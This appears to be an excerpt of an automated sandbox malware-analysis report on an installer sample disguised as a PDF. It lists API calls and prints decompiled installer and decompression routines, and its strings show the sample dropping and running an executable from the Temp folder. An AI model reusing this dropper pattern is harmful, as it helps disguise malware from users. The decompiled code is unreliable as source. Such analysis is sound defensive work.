                                                                                            0x00000000
                                                                                            0x004018bc
                                                                                            0x004018d3
                                                                                            0x004018d9
                                                                                            0x004018db
                                                                                            0x00000000
                                                                                            0x004018e1
                                                                                            0x004018e1
                                                                                            0x004018e4
                                                                                            0x004018fc
                                                                                            0x004018e6
                                                                                            0x004018e9
                                                                                            0x004018f2
                                                                                            0x004018f2
                                                                                            0x00401901
                                                                                            0x00401906
                                                                                            0x00402398
                                                                                            0x00000000
                                                                                            0x00402398
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                                            • CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user\AppData\Local\Temp\gkvlc.exe" C:\Users\user\AppData\Local\Temp\htujbhttw.eyi,"C:\Users\user\AppData\Local\Temp\gkvlc.exe" C:\Users\user\AppData\Local\Temp\htujbhttw.eyi,00000000,00000000,"C:\Users\user\AppData\Local\Temp\gkvlc.exe" C:\Users\user\AppData\Local\Temp\htujbhttw.eyi,C:\Users\user\AppData\Local\Temp,?,?,00000031), ref: 004017D5
                                                                                              • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                                                                              • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                              • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                              • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                                                              • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                            • String ID: "C:\Users\user\AppData\Local\Temp\gkvlc.exe" C:\Users\user\AppData\Local\Temp\htujbhttw.eyi$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp
                                                                                            • API String ID: 1941528284-384322453
                                                                                            • Opcode ID: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
                                                                                            • Instruction ID: 87dd38174d63fc88252c3cacf76d35d2aef1a13c6195c1d88e2760da23471212
                                                                                            • Opcode Fuzzy Hash: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
                                                                                            • Instruction Fuzzy Hash: DE41B771500205BACF10BBB5CD85DAE7A75EF45328B20473FF422B21E1D63D89619A2E
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004069C5 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 525 4069c5-4069e5 GetSystemDirectoryW 526 4069e7 525->526 527 4069e9-4069eb 525->527 526->527 528 4069fc-4069fe 527->528 529 4069ed-4069f6 527->529 531 4069ff-406a32 wsprintfW LoadLibraryExW 528->531 529->528 530 4069f8-4069fa 529->530 530->531
                                                                                            C-Code - Quality: 100%
                                                                                            			E004069C5(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}








                                                                                            0x004069dc
                                                                                            0x004069e5
                                                                                            0x004069e7
                                                                                            0x004069e7
                                                                                            0x004069eb
                                                                                            0x004069fe
                                                                                            0x004069f8
                                                                                            0x004069f8
                                                                                            0x004069f8
                                                                                            0x00406a17
                                                                                            0x00406a2b
                                                                                            0x00406a32

                                                                                            APIs
                                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                                                            • wsprintfW.USER32 ref: 00406A17
                                                                                            • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                            • String ID: %s%S.dll$UXTHEME$\
                                                                                            • API String ID: 2200240437-1946221925
                                                                                            • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                                                            • Instruction ID: e2ac2e7087162e0187f8b4d6776822ec24d6e31928394cf94a41c199a4feb156
                                                                                            • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                                                            • Instruction Fuzzy Hash: 3AF096B154121DA7DB14AB68DD0EF9B366CAB00705F11447EA646F20E0EB7CDA68CB98
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00406BB0 Relevance: 9.2, APIs: 4, Strings: 2, Instructions: 198COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 532 406bb0-406bd3 533 406bd5-406bd8 532->533 534 406bdd-406be0 532->534 535 4075fd-407601 533->535 536 406be3-406bec 534->536 537 406bf2 536->537 538 4075fa 536->538 539 406bf9-406bfd 537->539 540 406d39-4073e0 537->540 541 406c9e-406ca2 537->541 542 406d0e-406d12 537->542 538->535 543 406c03-406c10 539->543 544 4075e5-4075f8 539->544 550 4073e2-4073f8 540->550 551 4073fa-407410 540->551 548 406ca8-406cc1 541->548 549 40754e-407558 541->549 545 406d18-406d2c 542->545 546 40755d-407567 542->546 543->538 552 406c16-406c5c 543->552 544->535 553 406d2f-406d37 545->553 546->544 554 406cc4-406cc8 548->554 549->544 555 407413-40741a 550->555 551->555 556 406c84-406c86 552->556 557 406c5e-406c62 552->557 553->540 553->542 554->541 558 406cca-406cd0 554->558 561 407441-40744d 555->561 562 40741c-407420 555->562 565 406c94-406c9c 556->565 566 406c88-406c92 556->566 563 406c64-406c67 GlobalFree 557->563 564 406c6d-406c7b GlobalAlloc 557->564 559 406cd2-406cd9 558->559 560 406cfa-406d0c 558->560 567 406ce4-406cf4 GlobalAlloc 559->567 568 406cdb-406cde GlobalFree 559->568 560->553 561->536 569 407426-40743e 562->569 570 4075cf-4075d9 562->570 563->564 564->538 572 406c81 564->572 565->554 566->565 566->566 567->538 567->560 568->567 569->561 570->544 572->556
                                                                                            C-Code - Quality: 98%
                                                                                            			E00406BB0(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M00407602))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
